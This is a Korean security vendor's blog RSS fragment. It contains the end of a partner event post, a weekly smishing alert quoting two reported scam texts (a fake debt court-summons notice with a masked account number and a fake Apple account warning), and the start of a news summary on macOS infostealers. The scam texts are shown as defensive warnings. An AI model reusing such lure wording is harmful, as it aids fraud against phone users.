data-origin-height=&quot;720&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 7.png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;640&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/EYmJS/dJMcaaKWpcF/oepn0DiGY9g8Jkbr4r2zZ0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/EYmJS/dJMcaaKWpcF/oepn0DiGY9g8Jkbr4r2zZ0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/EYmJS/dJMcaaKWpcF/oepn0DiGY9g8Jkbr4r2zZ0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FEYmJS%2FdJMcaaKWpcF%2Foepn0DiGY9g8Jkbr4r2zZ0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;810&quot; height=&quot;540&quot; data-filename=&quot;Group 7.png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;640&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt; &lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt; 행사 주요 세션&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;2026년 이스트시큐리티 B2B 사업 전략&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;2026년 보안 시장 동향 및 주요 제품 로드맵&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;AI 결합을 통한 보안 패러다임 변화&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;AI SW 사업 소개(Perso AI)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;AX(AI Transformation) 사업 소개&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;2026년 보안 시장 변화와 파트너 성장을 위한 실행 전략&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;특히 개발혁신본부 김병훈&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;이사는 AI 기술을 보안에 접목한 전략적 방향성을 중심으로, AI 기반 위협 분석 및 대응 체계 고도화 방안과 이를 기반으로 한 신규 비즈니스 기회 창출 전략을 소개해 많은 관심을 받았습니다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;이스트시큐리티가 보유한 보안 기술력에 AI를 결합해 새로운 성장 동력을 만들어가는 방향성이 구체적으로 제시된 순간이었습니다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;상생&amp;nbsp;협력의&amp;nbsp;의미를&amp;nbsp;되새긴&amp;nbsp;&amp;lsquo;EST&amp;nbsp;Partner&amp;nbsp;Awards&amp;nbsp;2025&amp;rsquo;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 8.png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;640&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bp7LYm/dJMcai3dR5c/42gwHH3V8akodKKhojn55K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bp7LYm/dJMcai3dR5c/42gwHH3V8akodKKhojn55K/img.png&quot; data-alt=&quot;[이미지] 참관객들과 대화하는 페르소 AI 휴먼 스테이션&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bp7LYm/dJMcai3dR5c/42gwHH3V8akodKKhojn55K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbp7LYm%2FdJMcai3dR5c%2F42gwHH3V8akodKKhojn55K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;810&quot; height=&quot;540&quot; data-filename=&quot;Group 8.png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;640&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 참관객들과 대화하는 페르소 AI 휴먼 스테이션&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;행사 현장에서는 AI 기반 신시장과 관련된 기술과 비전을 보다 직관적으로 체험할 수 있는 구성도 함께 마련되었습니다. 또한 참석해주신 많은 파트너사 관계자분들께서는 저희를 미소짓게 하는 긍정적인 피드백을 주시기도 했습니다.&lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&amp;ldquo;AI 기반 보안 신시장을 직접 체감할 수 있어 인상 깊었다&amp;rdquo;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&amp;ldquo;각 세션이 실질적인 인사이트를 제공해 매우 유익했다&quot;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&amp;ldquo;전반적인 행사 운영이 원활해 만족도가 높았다&amp;rdquo;&lt;/span&gt;&lt;/blockquote&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이러한 반응은 행사 종료 후 진행된 설문조사를 통해서도 확인되었으며, 파트너사 관계자분들 역시 현장에서 &lt;span&gt;AI 보안의 가능성과 방향성을 직접 체감할 수 있었던 자리였음&lt;/span&gt;을 보여주었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 10.png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;720&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bCQZ0I/dJMcaiCbkfC/byk6c98L49obeaSBLqdop1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bCQZ0I/dJMcaiCbkfC/byk6c98L49obeaSBLqdop1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bCQZ0I/dJMcaiCbkfC/byk6c98L49obeaSBLqdop1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbCQZ0I%2FdJMcaiCbkfC%2Fbyk6c98L49obeaSBLqdop1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;810&quot; height=&quot;608&quot; data-filename=&quot;Group 10.png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;720&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 6.png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;640&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/YX1dK/dJMcai3dR5e/3ZRRX2IkRe84zKzrs8TkSk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/YX1dK/dJMcai3dR5e/3ZRRX2IkRe84zKzrs8TkSk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/YX1dK/dJMcai3dR5e/3ZRRX2IkRe84zKzrs8TkSk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FYX1dK%2FdJMcai3dR5e%2F3ZRRX2IkRe84zKzrs8TkSk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;810&quot; height=&quot;540&quot; data-filename=&quot;Group 6.png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;640&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;행사 후반에는 지난 한 해 동안 우수한 성과를 거둔 파트너사를 시상하는 &amp;lsquo;EST Partner Awards 2025&amp;rsquo;가 진행되었습니다. 이번 시상식은 단순한 성과 공유를 넘어, 이스트시큐리티와 파트너사가 함께 만들어 온 신뢰와 협력의 시간을 되돌아보는 자리로, 상생 협력의 가치를 다시 한 번 되새기는 의미 있는 시간이었습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;AI 시대, 파트너와 함께 보안 시장을 선도하겠습니다&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;정상원 이스트시큐리티 대표는 '보안 전문 기업 이스트시큐리티의 핵심 역량에 AI 기술을 결합해 신성장 동력을 만들어가는 것이 2026년의 핵심 전략'이라며, '파트너사와의 긴밀한 협력을 바탕으로 AI 시대 보안 시장을 선도해 나가겠다'고 밝혔습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 1 (2).png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;640&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cBuv8p/dJMcai3dR5f/3yuKbNJA0OFNAxhOHERlO0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cBuv8p/dJMcai3dR5f/3yuKbNJA0OFNAxhOHERlO0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cBuv8p/dJMcai3dR5f/3yuKbNJA0OFNAxhOHERlO0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcBuv8p%2FdJMcai3dR5f%2F3yuKbNJA0OFNAxhOHERlO0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;810&quot; height=&quot;540&quot; data-filename=&quot;Group 1 (2).png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;640&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이스트시큐리티는 이번 Partner Kick-Off 2026에서 공유된 전략과 방향성을 바탕으로, 파트너 중심의 사업 구조를 더욱 강화하고 AI 기반 보안 사업을 본격적으로 확대해 나갈 계획입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이번 행사가 성공적으로 마무리될 수 있도록 함께해주신 모든 파트너사 여러분과, 보이지 않는 곳에서 행사를 준비해주신 임직원 여러분께 깊이 감사드리며, 앞으로 이어질 이스트시큐리티의 2026년 행보에도 많은 관심과 기대를 부탁 &lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;드립니다!&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure data-ke-type=&quot;image&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; data-ke-style=&quot;alignCenter&quot; data-link=&quot;https://bit.ly/4nsdIJE&quot; data-link-islinknewwindow=&quot;true&quot;&gt;
&lt;figcaption style=&quot;display: none;&quot;&gt;&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>AI보안</category>
      <category>기업보안</category>
      <category>이스트시큐리티</category>
      <category>이스트시큐리티파트너</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5715</guid>
      <comments>https://alyacofficialblog.tistory.com/5715#entry5715comment</comments>
      <pubDate>Fri, 6 Feb 2026 14:30:44 +0900</pubDate>
    </item>
    <item>
      <title>**님 (주)다날 장기미납으로 법원출석 등기발송예정 1,227,369원 기업은행 480****0797105</title>
      <link>https://alyacofficialblog.tistory.com/5714</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Sdbsn/dJMcaa5ffqB/PoKlV47h38sUOZCTipjp30/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Sdbsn/dJMcaa5ffqB/PoKlV47h38sUOZCTipjp30/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Sdbsn/dJMcaa5ffqB/PoKlV47h38sUOZCTipjp30/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FSdbsn%2FdJMcaa5ffqB%2FPoKlV47h38sUOZCTipjp30%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;[2월 첫째주]&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;알약&amp;nbsp;스미싱&amp;nbsp;알림&amp;nbsp;본&amp;nbsp;포스트는&amp;nbsp;알약M&amp;nbsp;사용자&amp;nbsp;분들이&amp;nbsp;'신고하기'&amp;nbsp;기능을&amp;nbsp;통해&amp;nbsp;알약으로&amp;nbsp;신고해&amp;nbsp;주신&amp;nbsp;스미싱&amp;nbsp;내역&amp;nbsp;중&amp;nbsp;'특이&amp;nbsp;문자'를&amp;nbsp;자체&amp;nbsp;수집,&amp;nbsp;집계하여&amp;nbsp;제공해&amp;nbsp;드리는&amp;nbsp;정보성&amp;nbsp;포스트입니다.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;특이 문자&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div style=&quot;color: #333333; text-align: start;&quot;&gt;
&lt;div&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style14&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center;&quot;&gt;No.&lt;/td&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center;&quot;&gt;문자내용&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;1&lt;/td&gt;
&lt;td&gt;**님&amp;nbsp;(주)다날&amp;nbsp;장기미납으로&amp;nbsp;법원출석&amp;nbsp;등기발송예정&amp;nbsp;1,227,369원&amp;nbsp;기업은행&amp;nbsp;480****0797105&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;2&lt;/td&gt;
&lt;td style=&quot;background-color: #f9f9f9;&quot;&gt;[국외발신][애플]귀하의 계정에 이상이 감지되었습니다. 확인해주시기 바랍니다. s****e.cc&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span data-phocus=&quot;https://blog.kakaocdn.net/dna/bnmv74/dJMcaihRmm8/AAAAAAAAAAAAAAAAAAAAALEhqkIBG5-WpPVfCnjLP1y3oMRk23xBe-jBm3_2AaWE/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&amp;amp;expires=1772290799&amp;amp;allow_ip=&amp;amp;allow_referer=&amp;amp;signature=XvGAuiyc%2FAc5s%2Bye7RqQ0uwLcDQ%3D&quot; data-url=&quot;https://blog.kakaocdn.net/dna/bnmv74/dJMcaihRmm8/AAAAAAAAAAAAAAAAAAAAALEhqkIBG5-WpPVfCnjLP1y3oMRk23xBe-jBm3_2AaWE/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&amp;amp;expires=1772290799&amp;amp;allow_ip=&amp;amp;allow_referer=&amp;amp;signature=XvGAuiyc%2FAc5s%2Bye7RqQ0uwLcDQ%3D&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/GK6A2/dJMcadU9OPt/SX1orIZz9xtwHcy9121J70/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/GK6A2/dJMcadU9OPt/SX1orIZz9xtwHcy9121J70/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/GK6A2/dJMcadU9OPt/SX1orIZz9xtwHcy9121J70/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FGK6A2%2FdJMcadU9OPt%2FSX1orIZz9xtwHcy9121J70%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;출처&amp;nbsp;:&amp;nbsp;알약M&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;기간&amp;nbsp;:&amp;nbsp;2026년&amp;nbsp;1월&amp;nbsp;24일&amp;nbsp;~&amp;nbsp;2025년&amp;nbsp;1월&amp;nbsp;30일&lt;/p&gt;</description>
      <category>안전한 PC&amp;amp;모바일 세상/스미싱 알림</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5714</guid>
      <comments>https://alyacofficialblog.tistory.com/5714#entry5714comment</comments>
      <pubDate>Fri, 6 Feb 2026 10:14:21 +0900</pubDate>
    </item>
    <item>
      <title>macOS를 노리는 파이썬 기반 인포스틸러 공격</title>
      <link>https://alyacofficialblog.tistory.com/5713</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그동안 인포스틸러(Infostealer) 공격은 주로 윈도우 환경을 중심으로 확산돼 왔습니다. 그러나 최근 사이버 위협 동향은 이러한 인식을 빠르게 무너뜨리고 있습니다. macOS 사용자 역시 더 이상 안전지대가 아니라는 사실이 분명해지고 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;최근 해외 보안 매체 &lt;/span&gt;&lt;a style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot; href=&quot;https://cybersecuritynews.com/infostealer-campaigns-expand/#google_vignette&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;Cyber Security News&lt;/a&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;는 파이썬(Python)을 기반으로 한 인포스틸러 공격이 macOS 환경으로 확산되고 있다고 보도했습니다. 해당 공격은 악성 광고나 가짜 애플리케이션 설치를 유도하는 방식으로 시작되며, 계정 정보, 키체인(Keychain), 가상자산 지갑 데이터 등 민감한 정보를 탈취하는 것을 목적으로 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;989&quot; data-origin-height=&quot;735&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/v6M9f/dJMcaajShFD/xKhv8MqKkKipKfmDB1h6Rk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/v6M9f/dJMcaajShFD/xKhv8MqKkKipKfmDB1h6Rk/img.png&quot; data-alt=&quot;[이미지] 생성형 AI 제작&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/v6M9f/dJMcaajShFD/xKhv8MqKkKipKfmDB1h6Rk/img.png&quot; 